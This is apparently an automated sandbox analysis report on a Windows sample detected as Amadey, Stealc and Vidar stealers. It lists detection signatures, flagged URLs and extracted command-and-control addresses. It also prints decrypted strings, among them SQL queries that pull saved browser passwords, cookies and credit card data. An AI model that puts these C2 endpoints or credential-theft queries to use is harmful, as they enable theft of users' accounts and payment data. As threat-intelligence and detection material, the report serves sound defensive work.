Windows Analysis Report
file.exe

Overview

General Information

Sample name: file.exe
Analysis ID: 1482894
MD5: d3ce34e9bb2a33ab3d637e75af2a8bb8
SHA1: 6c309255f2e701f8325c0ba2eba8fe270c32e44a
SHA256: 8c207b724ee5d0febaa25aadf3861b31e3740412da99dfd53e5518db47082312
Tags: exe
Infos:

Detection

Amadey, Babadeda, Stealc, Vidar
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for URL or domain
Detected unpacking (changes PE section rights)
Detected unpacking (overwrites its own PE header)
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Yara detected Amadeys stealer DLL
Yara detected Babadeda
Yara detected Powershell download and execute
Yara detected Stealc
Yara detected Vidar stealer
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Creates multiple autostart registry keys
Found evasive API chain (may stop execution after checking locale)
Found many strings related to Crypto-Wallets (likely being stolen)
Hides threads from debuggers
Machine Learning detection for dropped file
Machine Learning detection for sample
Maps a DLL or memory area into another process
PE file contains section with special chars
Sample uses string decryption to hide its real strings
Searches for specific processes (likely to inject)
Sigma detected: New RUN Key Pointing to Suspicious Folder
Sigma detected: Suspicious File Creation In Uncommon AppData Folder
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
Tries to harvest and steal Bitcoin Wallet information
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
Tries to steal Mail credentials (via file / registry access)
Abnormal high CPU Usage
Checks for debuggers (devices)
Checks if the current process is being debugged
Connects to many different domains
Contains capabilities to detect virtual machines
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to create guard pages, often used to hinder reverse usering and debugging
Contains functionality to dynamically determine API calls
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Creates job files (autostart)
Detected non-DNS traffic on DNS port
Detected potential crypto function
Downloads executable code via HTTP
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the application program directory (C:\ProgramData)
Entry point lies outside standard sections
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
One or more processes crash
PE file contains an invalid checksum
PE file contains sections with non-standard names
Queries information about the installed CPU (vendor, model number etc)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: CurrentVersion Autorun Keys Modification
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Yara detected Credential Stealer
Yara signature match

Classification

Name Description Attribution Blogpost URLs Link
Amadey Amadey is a botnet that appeared around October 2018 and is being sold for about $500 on Russian-speaking hacking forums. It periodically sends information about the system and installed AV software to its C2 server and polls to receive orders from it. Its main functionality is that it can load other payloads (called "tasks") for all or specifically targeted computers compromised by the malware. No Attribution https://malpedia.caad.fkie.fraunhofer.de/details/win.amadey
Name Description Attribution Blogpost URLs Link
Babadeda According to PCrisk, Babadeda is a new sample in the crypters family, allowing threat actors to encrypt and obfuscate the malicious samples. The obfuscation allows malware to bypass the majority of antivirus protections without triggering any alerts. According to the researchers analysis, Babadeda leverages a sophisticated and complex obfuscation that shows a very low detection rate by anti-virus users. No Attribution https://malpedia.caad.fkie.fraunhofer.de/details/win.babadeda
Name Description Attribution Blogpost URLs Link
Stealc Stealc is an information stealer advertised by its presumed developer Plymouth on Russian-speaking underground forums and sold as a Malware-as-a-Service since January 9, 2023. According to Plymouth's statement, stealc is a non-resident stealer with flexible data collection settings and its development is relied on other prominent stealers: Vidar, Raccoon, Mars and Redline.Stealc is written in C and uses WinAPI functions. It mainly targets date from web browsers, extensions and Desktop application of cryptocurrency wallets, and from other applications (messengers, email clients, etc.). The malware downloads 7 legitimate third-party DLLs to collect sensitive data from web browsers, including sqlite3.dll, nss3.dll, vcruntime140.dll, mozglue.dll, freebl3.dll, softokn3.dll and msvcp140.dll. It then exfiltrates the collected information file by file to its C2 server using HTTP POST requests. No Attribution https://malpedia.caad.fkie.fraunhofer.de/details/win.stealc
Name Description Attribution Blogpost URLs Link
Vidar Vidar is a forked malware based on Arkei. It seems this stealer is one of the first that is grabbing information on 2FA Software and Tor Browser. No Attribution https://malpedia.caad.fkie.fraunhofer.de/details/win.vidar

AV Detection
barindex
Antivirus detection for URL or domain
Source: http://185.215.113.16/stealc/random.exencoded Avira URL Cloud: Label: phishing
Source: http://85.28.47.31/5499d72b3a3e55be. Avira URL Cloud: Label: malware
Source: http://185.215.113.19/Vi9leo/index.php Avira URL Cloud: Label: malware
Source: http://85.28.47.31/8405906461a5200c/vcruntime140.dll Avira URL Cloud: Label: malware
Source: http://185.215.113.19/238F-46AF-ADB4-6C85480369C7 Avira URL Cloud: Label: phishing
Source: http://185.215.113.19/Vi9leo/index.phpsm Avira URL Cloud: Label: phishing
Source: http://185.215.113.19/ows Avira URL Cloud: Label: phishing
Source: http://85.28.47.31/7w Avira URL Cloud: Label: malware
Source: http://85.28.47.31/8405906461a5200c/softokn3.dll Avira URL Cloud: Label: malware
Source: http://85.28.47.31/8405906461a5200c/nss3.dll Avira URL Cloud: Label: malware
Source: http://185.215.113.19/Vi9leo/index.phpEscape Avira URL Cloud: Label: phishing
Source: http://185.215.113.16/cost/random.exe Avira URL Cloud: Label: malware
Source: http://185.215.113.19/Vi9leo/index.phpsoft Avira URL Cloud: Label: phishing
Source: http://185.215.113.19/00003002 Avira URL Cloud: Label: phishing
Source: http://185.215.113.16/mine/enter.exera Avira URL Cloud: Label: phishing
Source: http://185.215.113.16/stealc/random.exerb Avira URL Cloud: Label: phishing
Source: http://185.215.113.16/mine/enter.exeM32 Avira URL Cloud: Label: phishing
Source: http://185.215.113.16/mine/enter.exe Avira URL Cloud: Label: phishing
Source: http://185.215.113.19/Vi9leo/index.php00003002 Avira URL Cloud: Label: phishing
Source: http://185.215.113.16/cost/random.exeW Avira URL Cloud: Label: phishing
Source: http://185.215.113.16/stealc/random.exe393d Avira URL Cloud: Label: phishing
Source: http://185.215.113.19/Vi9leo/index.php&b~ Avira URL Cloud: Label: phishing
Source: http://185.215.113.19/c0f9c30b4baed74c61395d7fac00b58987e8e8fda7df30804042ba5ce902415450#1. Avira URL Cloud: Label: phishing
Source: http://185.215.113.19/Vi9leo/index.php(8) Avira URL Cloud: Label: phishing
Source: http://85.28.47.31/5499d72b3a3e55be.phposition: Avira URL Cloud: Label: malware
Found malware configuration
Source: 0.2.file.exe.4090e67.1.raw.unpack Malware Configuration Extractor: Vidar {"C2 url": "http://85.28.47.31silence"}
Source: file.exe.2036.0.memstrmin Malware Configuration Extractor: StealC {"C2 url": "http://85.28.47.31/5499d72b3a3e55be.php"}
Source: explorti.exe.7716.18.memstrmin Malware Configuration Extractor: Amadey {"C2 url": ["http://185.215.113.19/Vi9leo/index.php"]}
Multi AV Scanner detection for dropped file
Source: C:\Users\user\1000003002\5aa32fec17.exe ReversingLabs: Detection: 39%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6ATIQPJI\enter[1].exe ReversingLabs: Detection: 47%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\random[1].exe ReversingLabs: Detection: 39%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BLNS00AZ\random[1].exe ReversingLabs: Detection: 50%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\RCIIZOAM\random[1].exe ReversingLabs: Detection: 36%
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe ReversingLabs: Detection: 47%
Source: C:\Users\user\AppData\Local\Temp\1000002001\7ca32398cd.exe ReversingLabs: Detection: 36%
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe ReversingLabs: Detection: 50%
Source: C:\Users\user\AppData\RoamingBKJEGDGIJE.exe ReversingLabs: Detection: 50%
Source: C:\Users\user\AppData\RoamingIJEGDBGDBF.exe ReversingLabs: Detection: 47%
Multi AV Scanner detection for submitted file
Source: file.exe ReversingLabs: Detection: 36%
Source: file.exe Virustotal: Detection: 46% Perma Link
AI detected suspicious sample
Source: Submited Sample Integrated Neural Analysis Model: Matched 100.0% probability
Machine Learning detection for dropped file
Source: C:\Users\user\1000003002\5aa32fec17.exe Joe Sandbox ML: detected
Machine Learning detection for sample
Source: file.exe Joe Sandbox ML: detected
Sample uses string decryption to hide its real strings
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: INSERT_KEY_HERE
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: 22
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: 08
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: 20
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: 24
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: GetProcAddress
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: LoadLibraryA
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: lstrcatA
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: OpenEventA
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: CreateEventA
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: CloseHandle
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: Sleep
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: GetUserDefaultLangID
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: VirtualAllocExNuma
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: VirtualFree
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: GetSystemInfo
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: VirtualAlloc
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: HeapAlloc
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: GetComputerNameA
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: lstrcpyA
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: GetProcessHeap
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: GetCurrentProcess
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: lstrlenA
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: ExitProcess
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: GlobalMemoryStatusEx
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: GetSystemTime
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: SystemTimeToFileTime
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: advapi32.dll
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: gdi32.dll
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: user32.dll
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: crypt32.dll
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: ntdll.dll
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: GetUserNameA
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: CreateDCA
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: GetDeviceCaps
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: ReleaseDC
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: CryptStringToBinaryA
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: sscanf
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: VMwareVMware
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: HAL9TH
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: JohnDoe
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: DISPLAY
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: %hu/%hu/%hu
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: http://85.28.47.31
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: silence
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: /5499d72b3a3e55be.php
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: /8405906461a5200c/
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: sila
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: GetEnvironmentVariableA
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: GetFileAttributesA
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: GlobalLock
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: HeapFree
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: GetFileSize
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: GlobalSize
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: CreateToolhelp32Snapshot
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: IsWow64Process
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: Process32Next
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: GetLocalTime
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: FreeLibrary
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: GetTimeZoneInformation
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: GetSystemPowerStatus
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: GetVolumeInformationA
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: GetWindowsDirectoryA
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: Process32First
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: GetLocaleInfoA
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: GetUserDefaultLocaleName
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: GetModuleFileNameA
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: DeleteFileA
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: FindNextFileA
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: LocalFree
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: FindClose
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: SetEnvironmentVariableA
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: LocalAlloc
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: GetFileSizeEx
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: ReadFile
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: SetFilePointer
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: WriteFile
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: CreateFileA
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: FindFirstFileA
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: CopyFileA
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: VirtualProtect
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: GetLogicalProcessorInformationEx
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: GetLastError
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: lstrcpynA
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: MultiByteToWideChar
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: GlobalFree
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: WideCharToMultiByte
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: GlobalAlloc
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: OpenProcess
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: TerminateProcess
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: GetCurrentProcessId
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: gdiplus.dll
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: ole32.dll
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: bcrypt.dll
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: wininet.dll
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: shlwapi.dll
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: shell32.dll
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: psapi.dll
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: rstrtmgr.dll
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: CreateCompatibleBitmap
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: SelectObject
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: BitBlt
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: DeleteObject
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: CreateCompatibleDC
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: GdipGetImageEncodersSize
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: GdipGetImageEncoders
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: GdipCreateBitmapFromHBITMAP
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: GdiplusStartup
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: GdiplusShutdown
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: GdipSaveImageToStream
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: GdipDisposeImage
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: GdipFree
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: GetHGlobalFromStream
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: CreateStreamOnHGlobal
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: CoUninitialize
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: CoInitialize
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: CoCreateInstance
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: BCryptGenerateSymmetricKey
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: BCryptCloseAlgorithmProvider
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: BCryptDecrypt
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: BCryptSetProperty
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: BCryptDestroyKey
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: BCryptOpenAlgorithmProvider
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: GetWindowRect
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: GetDesktopWindow
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: GetDC
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: CloseWindow
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: wsprintfA
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: EnumDisplayDevicesA
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: GetKeyboardLayoutList
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: CharToOemW
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: wsprintfW
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: RegQueryValueExA
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: RegEnumKeyExA
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: RegOpenKeyExA
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: RegCloseKey
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: RegEnumValueA
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: CryptBinaryToStringA
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: CryptUnprotectData
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: SHGetFolderPathA
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: ShellExecuteExA
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: InternetOpenUrlA
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: InternetConnectA
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: InternetCloseHandle
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: InternetOpenA
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: HttpSendRequestA
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: HttpOpenRequestA
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: InternetReadFile
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: InternetCrackUrlA
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: StrCmpCA
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: StrStrA
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: StrCmpCW
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: PathMatchSpecA
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: GetModuleFileNameExA
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: RmStartSession
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: RmRegisterResources
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: RmGetList
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: RmEndSession
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: sqlite3_open
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: sqlite3_prepare_v2
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: sqlite3_step
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: sqlite3_column_text
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: sqlite3_finalize
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: sqlite3_close
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: sqlite3_column_bytes
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: sqlite3_column_blob
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: encrypted_key
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: PATH
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: C:\ProgramData\nss3.dll
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: NSS_Init
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: NSS_Shutdown
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: PK11_GetInternalKeySlot
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: PK11_FreeSlot
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: PK11_Authenticate
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: PK11SDR_Decrypt
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: C:\ProgramData\
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: SELECT origin_url, username_value, password_value FROM logins
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: browser:
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: profile:
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: url:
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: login:
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: password:
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: Opera
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: OperaGX
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: Network
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: cookies
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: .txt
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: SELECT HOST_KEY, is_httponly, path, is_secure, (expires_utc/1000000)-11644480800, name, encrypted_value from cookies
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: TRUE
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: FALSE
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: autofill
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: SELECT name, value FROM autofill
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: history
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: SELECT url FROM urls LIMIT 1000
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: cc
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: SELECT name_on_card, expiration_month, expiration_year, card_number_encrypted FROM credit_cards
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: name:
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: month:
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: year:
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: card:
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: Cookies
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: Login Data
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: Web Data
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: History
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: logins.json
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: formSubmitURL
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: usernameField
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: encryptedUsername
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: encryptedPassword
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: guid
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: SELECT host, isHttpOnly, path, isSecure, expiry, name, value FROM moz_cookies
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: SELECT fieldname, value FROM moz_formhistory
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: SELECT url FROM moz_places LIMIT 1000
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: cookies.sqlite
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: formhistory.sqlite
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: places.sqlite
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: plugins
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: Local Extension Settings
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: Sync Extension Settings
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: IndexedDB
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: Opera Stable
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: Opera GX Stable
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: CURRENT
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: chrome-extension_
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: _0.indexeddb.leveldb
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: Local State
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: profiles.ini
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: chrome
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: opera
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: firefox
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: wallets
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: %08lX%04lX%lu
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: SOFTWARE\Microsoft\Windows NT\CurrentVersion
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: ProductName
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: x32
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: x64
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: %d/%d/%d %d:%d:%d
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: HARDWARE\DESCRIPTION\System\CentralProcessor\0
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: ProcessorNameString
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: DisplayName
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: DisplayVersion
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: Network Info:
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: - IP: IP?
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: - Country: ISO?
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: System Summary:
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: - HWID:
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: - OS:
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: - Architecture:
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: - UserName:
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: - Computer Name:
